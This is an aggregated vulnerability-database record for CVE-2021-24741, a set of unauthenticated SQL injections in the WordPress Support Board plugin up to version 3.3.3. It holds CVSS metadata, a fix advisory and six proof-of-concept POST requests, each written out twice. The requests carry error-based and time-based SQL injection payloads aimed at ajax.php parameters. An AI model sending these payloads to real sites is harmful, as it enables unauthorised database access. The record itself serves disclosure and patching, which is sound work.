Description
Multiple Unauthenticated SQL Injection (SQLi) vulnerabilities were discovered by John Jefferson Li in the WordPress Support Board plugin (versions <= 3.3.3).
## Solution
Update the WordPress Support Board plugin to the latest available version (at least 3.3.4).
Affected Software
Related
{"id": "PATCHSTACK:2808AE58637DE676BE640C8E41E525B7", "vendorId": null, "type": "patchstack", "bulletinFamily": "software", "title": "WordPress Support Board plugin <= 3.3.3 - Multiple Unauthenticated SQL Injection (SQLi) vulnerabilities", "description": "Multiple Unauthenticated SQL Injection (SQLi) vulnerabilities were discovered by John Jefferson Li in the WordPress Support Board plugin (versions <= 3.3.3).\n\n## Solution\n\n\r\n Update the WordPress Support Board plugin to the latest available version (at least 3.3.4).\r\n ", "published": "2021-09-13T00:00:00", "modified": "2021-09-13T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://patchstack.com/database/vulnerability/supportboard/wordpress-support-board-plugin-3-3-3-multiple-unauthenticated-sql-injection-sqli-vulnerabilities", "reporter": "John Jefferson Li", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24741", "https://medium.com/@lijohnjefferson/multiple-sql-injection-unauthenticated-in-support-board-v-3-3-3-3e9b4214a4f9", "https://board.support/changes"], "cvelist": ["CVE-2021-24741"], "immutableFields": [], "lastseen": "2022-06-01T19:30:21", "viewCount": 7, "enchantments": {"score": {"value": 2.4, "vector": "NONE"}, "dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0752"]}, {"type": "cve", "idList": ["CVE-2021-24741"]}, {"type": "githubexploit", "idList": ["1D1D02B2-39A1-5329-8EB0-8A61D78F15B9"]}, {"type": "wpexploit", "idList": ["WPEX-ID:CCF293EC-7607-412B-B662-5E237B8690CA"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:CCF293EC-7607-412B-B662-5E237B8690CA"]}]}, "affected_software": {"major_version": [{"name": "support board", "version": 3}]}, "vulnersScore": 2.4}, "_state": {"score": 1660007483, "dependencies": 1660004461, "affected_software_major_version": 1666695388}, "_internal": {"score_hash": "ddfaec7d832a396750f5e2b24a264c9a"}, "affectedSoftware": [{"version": "3.3.3", "operator": "le", "name": "support board"}], "vendor_cvss": {"score": "3.1", "severity": "Critical severity"}, "owasp": "A1: Injection", "classification": "SQL Injection"}
{"wpvulndb": [{"lastseen": "2021-11-26T19:16:07", "description": "The plugin does not escape multiple POST parameters (such as status_code, department, user_id, conversation_id, conversation_status_code, and recipient_id) before using them in SQL statements, leading to SQL injections which are exploitable by unauthenticated users.\n\n### PoC\n\nThe login-cookie parameter is needed, but does not require to be logged in. \\----- PoC 1: Error Based SQLi (status_code) ----- Request POST /wp-content/plugins/supportboard/include/ajax.php HTTP/1.1 Vulnerable Parameter: status_code (POST) function=new-conversation&status;_code=2\"+AND+EXTRACTVALUE(4597,CONCAT(\"\",\"DB+Name:+\",(SELECT+(ELT(4597=4597,\"\"))),database()))+AND+\"fKoo\"=\"fKoo&title;=&department;=&agent;_id=&routing;=false&login-cookie;=&user;_id=46&language;=false \\----- PoC 2: Error Based SQLi (department)----- Request POST /wp-content/plugins/supportboard/include/ajax.php HTTP/1.1 Vulnerable Parameter: department (POST) function=new-conversation&status;_code=2o&title;=&department;=(UPDATEXML(5632,CONCAT(0x2e,\"Database+Name:+\",(SELECT+(ELT(5632=5632,\"\"))),database()),3004))&agent;_id=&routing;=false&login-cookie;=&user;_id=46&language;=false \\----- PoC 3: Error Based SQLi (user_id) ----- Request POST /wp-content/plugins/supportboard/include/ajax.php HTTP/1.1 Vulnerable Parameter: user_id (POST) function=send-message&user;_id=-5\"+AND+GTID_SUBSET(CONCAT(\"Database+Name:+\",(SELECT+(ELT(3919=3919,\"\"))),database()),3919)+AND+\"wrOJ\"=\"wrOJ&conversation;_id=35&message;=TEST+POC&conversation;_status_code=false&queue;=false&payload;=false&recipient;_id=false&login-cookie;=&language;=false \\----- PoC 4: Time Based SQLi (conversation_id)----- Request POST /wp-content/plugins/supportboard/include/ajax.php HTTP/1.1 Vulnerable Parameter: conversation_id (POST) function=send-message&user;_id=5&conversation;_id=45\"+AND+(SELECT 1479+FROM+(SELECT(SLEEP(5)))xttx)--+BOXv&message;=test+&conversation;_status_code=false&queue;=false&payload;=false&recipient;_id=false&login-cookie;=&language;=false \\----- PoC 5: Time Based SQLi (conversation_status_code)----- Request POST /wp-content/plugins/supportboard/include/ajax.php HTTP/1.1 Vulnerable Parameter: conversation_status_code (POST) function=send-message&user;_id=5&conversation;_id=45&message;=test+&conversation;_status_code=false+WHERE+9793=9793+AND+(SELECT+4500+FROM+(SELECT(SLEEP(5)))oJCl)--+uAGp&queue;=false&payload;=false&recipient;_id=false&login-cookie;=&language;=false \\----- PoC 6: Time Based SQLi (recipient_id)----- Request POST /wp-content/plugins/supportboard/include/ajax.php HTTP/1.1 Vulnerable Parameter: recipient_id (POST) function=send-message&user;_id=5&conversation;_id=45&message;=test+&conversation;_status_code=false&queue;=false&payload;=false&recipient;_id=false+AND+(SELECT+7416+FROM+(SELECT(SLEEP(5)))eBhm)&login-cookie;=&language;=false\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-03T00:00:00", "type": "wpvulndb", "title": "Support Board < 3.3.4 - Multiple Unauthenticated SQL Injections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24741"], "modified": "2021-09-15T13:37:35", "id": "WPVDB-ID:CCF293EC-7607-412B-B662-5E237B8690CA", "href": "https://wpscan.com/vulnerability/ccf293ec-7607-412b-b662-5e237b8690ca", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:31:57", "description": "An SQL injection vulnerability exists in Support Board WordPress plugin before 3.3.4. Successful exploitation of this vulnerability would allow a remote attacker to execute arbitrary SQL commands on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-10T00:00:00", "type": "checkpoint_advisories", "title": "WordPress Support Board Plugin SQL Injection (CVE-2021-24741)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24741"], "modified": "2021-10-10T00:00:00", "id": "CPAI-2021-0752", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T15:03:20", "description": "The Support Board WordPress plugin before 3.3.4 does not escape multiple POST parameters (such as status_code, department, user_id, conversation_id, conversation_status_code, and recipient_id) before using them in SQL statements, leading to SQL injections which are exploitable by unauthenticated users.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-20T10:15:00", "type": "cve", "title": "CVE-2021-24741", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24741"], "modified": "2021-10-01T18:35:00", "cpe": [], "id": "CVE-2021-24741", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24741", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "wpexploit": [{"lastseen": "2021-11-26T19:16:07", "description": "The plugin does not escape multiple POST parameters (such as status_code, department, user_id, conversation_id, conversation_status_code, and recipient_id) before using them in SQL statements, leading to SQL injections which are exploitable by unauthenticated users.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-03T00:00:00", "type": "wpexploit", "title": "Support Board < 3.3.4 - Multiple Unauthenticated SQL Injections", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24741"], "modified": "2021-09-15T13:37:35", "id": "WPEX-ID:CCF293EC-7607-412B-B662-5E237B8690CA", "href": "", "sourceData": "The login-cookie parameter is needed, but does not require to be logged in.\r\n\r\n----- PoC 1: Error Based SQLi (status_code) -----\r\n\r\nRequest \r\n\r\nPOST /wp-content/plugins/supportboard/include/ajax.php HTTP/1.1\r\nVulnerable Parameter: status_code (POST)\r\n\r\nfunction=new-conversation&status_code=2\"+AND+EXTRACTVALUE(4597,CONCAT(\"\",\"DB+Name:+\",(SELECT+(ELT(4597=4597,\"\"))),database()))+AND+\"fKoo\"=\"fKoo&title=&department=&agent_id=&routing=false&login-cookie=&user_id=46&language=false\r\n\r\n\r\n----- PoC 2: Error Based SQLi (department)-----\r\n\r\nRequest \r\n\r\nPOST /wp-content/plugins/supportboard/include/ajax.php HTTP/1.1\r\nVulnerable Parameter: department (POST)\r\n\r\nfunction=new-conversation&status_code=2o&title=&department=(UPDATEXML(5632,CONCAT(0x2e,\"Database+Name:+\",(SELECT+(ELT(5632=5632,\"\"))),database()),3004))&agent_id=&routing=false&login-cookie=&user_id=46&language=false\r\n\r\n\r\n----- PoC 3: Error Based SQLi (user_id) -----\r\n\r\nRequest \r\n\r\nPOST /wp-content/plugins/supportboard/include/ajax.php HTTP/1.1\r\nVulnerable Parameter: user_id (POST)\r\n\r\nfunction=send-message&user_id=-5\"+AND+GTID_SUBSET(CONCAT(\"Database+Name:+\",(SELECT+(ELT(3919=3919,\"\"))),database()),3919)+AND+\"wrOJ\"=\"wrOJ&conversation_id=35&message=TEST+POC&conversation_status_code=false&queue=false&payload=false&recipient_id=false&login-cookie=&language=false\r\n\r\n\r\n----- PoC 4: Time Based SQLi (conversation_id)-----\r\n\r\nRequest\r\n\r\nPOST /wp-content/plugins/supportboard/include/ajax.php HTTP/1.1\r\nVulnerable Parameter: conversation_id (POST)\r\n\r\nfunction=send-message&user_id=5&conversation_id=45\"+AND+(SELECT 1479+FROM+(SELECT(SLEEP(5)))xttx)--+BOXv&message=test+&conversation_status_code=false&queue=false&payload=false&recipient_id=false&login-cookie=&language=false\r\n\r\n\r\n----- PoC 5: Time Based SQLi (conversation_status_code)-----\r\n\r\nRequest\r\n\r\nPOST /wp-content/plugins/supportboard/include/ajax.php HTTP/1.1\r\nVulnerable Parameter: conversation_status_code (POST)\r\n\r\nfunction=send-message&user_id=5&conversation_id=45&message=test+&conversation_status_code=false+WHERE+9793=9793+AND+(SELECT+4500+FROM+(SELECT(SLEEP(5)))oJCl)--+uAGp&queue=false&payload=false&recipient_id=false&login-cookie=&language=false\r\n\r\n\r\n----- PoC 6: Time Based SQLi (recipient_id)-----\r\n\r\nRequest\r\n\r\nPOST /wp-content/plugins/supportboard/include/ajax.php HTTP/1.1\r\nVulnerable Parameter: recipient_id (POST)\r\n\r\nfunction=send-message&user_id=5&conversation_id=45&message=test+&conversation_status_code=false&queue=false&payload=false&recipient_id=false+AND+(SELECT+7416+FROM+(SELECT(SLEEP(5)))eBhm)&login-cookie=&language=false", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-03-17T22:50:49", "description": "# CVE-2021-24741\n\n#### Multiple SQL Injection (Unauthenticated) ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-28T18:34:40", "type": "githubexploit", "title": "Exploit for SQL Injection in Schiocco Support Board - Chat And Help Desk", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24741"], "modified": "2022-03-17T13:42:12", "id": "1D1D02B2-39A1-5329-8EB0-8A61D78F15B9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}]}
WordPress Support Board plugin <= 3.3.3 - Multiple Unauthenticated SQL Injection (SQLi) vulnerabilities
